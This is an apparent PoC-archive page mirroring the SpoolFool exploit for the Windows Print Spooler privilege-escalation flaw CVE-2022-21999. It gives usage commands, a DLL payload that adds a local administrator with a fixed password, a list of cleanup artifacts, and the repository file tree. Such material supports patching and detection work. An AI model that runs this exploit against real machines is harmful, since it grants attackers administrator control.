Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-21999 PoC — Microsoft Windows Print Spooler Components 后置链接漏洞

Source
https://github.com/ly4k/SpoolFool
Associated Vulnerability
Title:Microsoft Windows Print Spooler Components 后置链接漏洞 (CVE-2022-21999)
Description:Microsoft Windows Print Spooler Components是美国微软(Microsoft)公司的一个打印后台处理程序组件。 Microsoft Windows Print Spooler Components存在后置链接漏洞。以下产品和版本受到影响:Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation),Windows Server 2008 for x64-based Sy
Description
Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)
Readme
# SpoolFool

Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)

## Details

The provided exploit should work by default on all Windows desktop versions.

Please see the blog post for full technical details [here](https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81).

## Usage

```powershell
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
```

### Powershell

```powershell
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
```

## Proof of Concept

The following PoC uses a DLL that creates a new local administrator `admin / Passw0rd!`. The DLL (`AddUser.dll`) and the source code can be found in this repository.

![](imgs/poc.png)

**Second run**

The following PoC demonstrates a second run of the provided exploit. Notice that the vulnerability is not exploited this time in order to load the DLL. 

![](imgs/second_run.png)

## Artifacts

After the exploit has been executed, the following artifacts will be left for later cleanup:
- The created printer driver directory is not removed
- The payload DLL is copied to the printer driver directory and it is not removed
- Any created printer is not removed
- The `SpoolDirectory` value of the targeted printer is not restored

## Authors
- Oliver Lyak [@ly4k_](https://twitter.com/ly4k_)

## References
- [SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)](https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81)
File Snapshot

 [4.0K]  /data/pocs/de8a55d16ba88ce9302ff1d6cf4c23ac11532da8
├── [4.0K]  AddUser
│   ├── [1.4K]  AddUser.sln
│   ├── [8.1K]  AddUser.vcxproj
│   ├── [1.2K]  AddUser.vcxproj.filters
│   ├── [ 165]  AddUser.vcxproj.user
│   ├── [1.5K]  dllmain.cpp
│   ├── [ 149]  framework.h
│   ├── [ 186]  pch.cpp
│   └── [ 563]  pch.h
├── [ 10K]  AddUser.dll
├── [4.0K]  imgs
│   ├── [ 77K]  poc.png
│   └── [ 30K]  second_run.png
├── [1.0K]  LICENSE
├── [2.0K]  README.md
├── [4.0K]  SpoolFool
│   ├── [ 184]  App.config
│   ├── [ 16K]  JunctionPoints.cs
│   ├── [4.2K]  Printer.cs
│   ├── [8.2K]  Program.cs
│   ├── [4.0K]  Properties
│   │   └── [1.4K]  AssemblyInfo.cs
│   ├── [2.3K]  SpoolFool.csproj
│   └── [1.1K]  SpoolFool.sln
├── [ 18K]  SpoolFool.exe
└── [ 11K]  SpoolFool.ps1

4 directories, 22 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.